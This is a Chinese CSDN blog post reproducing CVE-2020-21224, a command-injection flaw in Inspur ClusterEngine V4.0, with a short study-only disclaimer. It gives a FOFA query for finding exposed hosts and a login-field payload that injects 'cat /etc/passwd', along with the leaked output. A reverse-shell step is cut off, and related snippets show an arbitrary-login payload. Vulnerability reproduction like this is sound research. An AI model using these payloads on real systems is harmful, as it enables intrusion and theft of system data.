浪潮ClusterEngineV4.0 远程命令执行漏洞 CVE-2020-21224

最新推荐文章于 2025-01-16 21:00:22 发布
最新推荐文章于 2025-01-16 21:00:22 发布
阅读量1.5k 收藏 1
点赞数
CC 4.0 BY-SA版权
分类专栏: 漏洞复现 文章标签: 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/xiTaiShen/article/details/125989764
本文介绍了浪潮ClusterEngineV4.0存在的远程命令执行漏洞CVE-2020-21224,详细阐述了漏洞简介、影响范围,并提供了FOFA语法和漏洞复现的步骤,旨在学习研究,提醒注意合法使用。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

浪潮ClusterEngineV4.0 远程命令执行漏洞 CVE-2020-21224

此文章仅供用于学习研究,严禁用于非法用途,否则后果自负。

漏洞简介

浪潮服务器群集管理系统存在危险字符未过滤,导致远程命令执行

漏洞影响

浪潮ClusterEngineV4.0

FOFA语法

title="TSCEV4.0"

漏洞复现

登录页面如下

img

POC

POC测试(出现 root:x:0:0 则存在漏洞)
op=login&username=test`$(cat /etc/passwd)`

{"err":"/bin/sh: root:x:0:0:root:/root:/bin/bash: No such file or directory\n","exitcode":1,"out":"the user test does not exist\nerror:1\n"}

反弹shell
op=login&username=te
了解本专栏 订阅专栏 解锁全文 超级会员免费看
浪潮ClusterEngineV4.0 sysShell 远程命令执行
「我唯一会的和擅长的只有网络安全,如果我不能在我最擅长的事情上取得成功,那么我根本不知道,我的人生还有什么意义。」
05-28 374
既然已经决定做一件事,那么除了当初决定做这件事的我之外,没人可以叫我傻瓜。
浪潮ClusterEngineV4.0 任意用户登录
「我唯一会的和擅长的只有网络安全,如果我不能在我最擅长的事情上取得成功,那么我根本不知道,我的人生还有什么意义。」
05-27 325
所谓理想,只是同时拥有实力的人才能说的“现实”。所谓弱就是一种罪。
CVE-2020-21224浪潮ClusterEngineV4.0 远程命令执行漏洞复现
ximo的博客
04-14 4034
简介 浪潮 Inspur ClusterEngine是中国浪潮公司的一个应用软件。提供管理集群系统中软硬件提交的作业。 漏洞描述 浪潮服务器群集管理系统存在危险字符未过滤,导致远程命令执行 影响版本 浪潮ClusterEngineV4.0 FOFA title="TSCEV4.0" 复现过程 FOFA搜索: 登录页面: 输入账号密码,进行抓包: 页面不存在验证码,且存在用户名枚举,进行暴力破解: 通过fuzz,发现在用户名或密码任意一处添加 ’ ,会报错: 正常输入: 添加单引号: 添加分号,
浪潮ClusterEngineV4.0 任意用户登录漏洞
qq_17754023的博客
02-28 1429
1.漏洞描述 浪潮ClusterEngineV4.0 存在任意用户登录漏洞,构造恶意的用户名和密码即可获取后台权限。 2.资产查找 FOFA:title="TSCEV4.0" 3.漏洞复现 1)进入登录页面 2)输入用户名和密码如下,即可进入后台 USER: admin|pwd PASS: 任意 点击登陆 ...
浪潮 ClusterEngineV4.0 任意命令执行
xxx9686的博客
09-20 698
浪潮ClusterEngine集群管理平台是专为浪潮天梭系列HPC产品定制的一款作业管理软件,该软件采用B/S架构,通过浏览器(IE,firefox等)进行操作,可以管理集群系统中的软硬件资源和用户提交的作业,根据集群中的资源使用情况来合理的调度用户提交的作业,从而达到提高资源的利用率和作业的执行效率的作用。其4.0版本存在任意命令执行漏洞。攻击者通过发送精心构造的请求包到目标应用程序,将会造成远程命令执行漏洞。甚至获得目标站点的服务器权限。
浪潮 ClusterEngineV4.0 任意用户登录+命令执行
StriveBen的博客
04-12 2997
概述 浪潮clusterengine v4.0 集群管理平台,可管理集群系统中的软硬件资源和用户提交的作业,根据集群中的资源使用情况来合理的调度用户提交的作业,从而达到提高资源的利用率和作业的执行效率的作用。 在网络空间测绘搜索引擎中搜索关键字: title="TSCEV4.0"或者"clusterengine v4.0"收集相关资产。 任意用户登录 指定登录过程中的username字段值为"any|pwd"形式即可登录系统: POST /login HTTP/1.1 Host: xxx Co
CVE-2020-21224 ClusterEngineV4.0 远程代码执行.md
04-11
CVE-2020-21224 ClusterEngineV4.0 远程代码执行
BMC 历史漏洞汇总
weixin_40418457的博客
06-18 2872
刚开始接触 BMC 以为研究的人比较少,感觉一般人也没有机会接触到。尤其是服务器风扇的声音,一般人也不想去碰。去查了一下 CVE 之后,发现有不少漏洞,还挺多人玩的。近期也在研究这一块,把 BMC 曾曝出的漏洞做个汇总,看看大佬们都有哪些奇妙的思路。 BMC (Baseboard Management Controller)即 基板管理控制器 ,提供 IPMI/Redfish 架构中的智能特性。它是嵌入在计算机(通常是服务器)主板上的专用微控制器。 BMC负责管理系统管理软件和平台硬件之间的接口。用于计
2021 HW 漏洞清单汇总 ( 附 poc )
热门推荐
gjgj的博客
04-23 1万+
2021 HW 漏洞清单汇总 2021.4.8——4.22 披露时间 涉及商家/产品漏洞描述 2021/04/08启明星辰天清汉马USG防火墙存在逻辑缺陷漏洞(历史漏洞) CNVD-2021-17391 启明星辰 天清汉马USG防火墙 逻辑缺陷漏洞 CNVD-2021-12793 2021/04/08禅道项目管理软件11.6禅道 11.6 sql注...
insuperRCE:浪潮ClusterEngineV4.0 前台getshell
04-16
insuperRCE 浪潮ClusterEngineV4.0 前台getshell
漏洞复现-浪潮-GS企业管理软件-RCE
无问社区的博客
08-28 1787
浪潮GS是浪潮研发的系统软件,浪潮GS,采用SOA 架构和先进开放的GSP 应用中间件开发,面向大中型集团企业提供的一套数据集中、应用集中、管理集中的全面解决方案。浪潮GS企业管理软件存在RCE(Remote Code Execution,远程代码执行)漏洞是指攻击者能够在远程服务器上执行任意代码的安全漏洞。此类漏洞通常会让攻击者完全控制受影响的系统,导致严重的安全问题。
浪潮GS企业管理软件GetChildFormAndEntityList存在反序列化漏洞
xiaokp7的博客
07-24 1143
浪潮GS 面向大中型集团企业采用SOA 架构和先进开放的GSP 应用中间件开发,形成了集团管控13 大领域15 大行业60余个细分行业的解决方案。在管理方面,浪潮GS 有效帮助企业有效实现财务集中管理、资金集中管理、资产集中管理、供应链集中管理,从而达到集团信息的集中监控以及企业集团成员之间资源共享、合作共赢、共同发展。在业务方面,浪潮GS 支持供应链协同、生产管理协同,打破企业资源(人、财、物、信息、流程等)之间的各种壁垒和边界,帮助企业实现内外供应链的全面管理,从而提高了整个产业链对客户的反应速度。
浪潮云财务系统xtdysrv.asmx存在命令执行漏洞
最新发布
西米安全
01-16 755
浪潮云财务系统xtdysrv.asmx存在命令执行漏洞,未经身份验证的远程攻击者可通过该漏洞服务器端任意执行代码。
浪潮ClusterEngineV4.0 远程命令执行
「我唯一会的和擅长的只有网络安全,如果我不能在我最擅长的事情上取得成功,那么我根本不知道,我的人生还有什么意义。」
05-29 283
胜利和败北都要品尝,经历过四处流浪的辛酸,痛苦和悲伤的回忆,这样才能独当一面,就算痛哭流涕也没关系!
浪潮远控卡的登录爆破漏洞
weixin_30326515的博客
01-26 993
一、浪潮远控卡简介 浪潮远控卡是一款插在服务器上的,方便运维人员和服务器管理人员对服务器进行远程控制的WEB服务,其在80端口对外提供HTTP服务。登录进去以后可以对服务器硬件进行远程控制和管理。例如CPU、内存等性能指标监控,远程开启关闭服务器上的虚拟机,甚至作为控制虚拟主机的跳板机。 二、浪潮远控卡的漏洞浪潮远控卡可以尝试使用admin/admin进行登录尝试,很有可能可以进...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

初岄

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值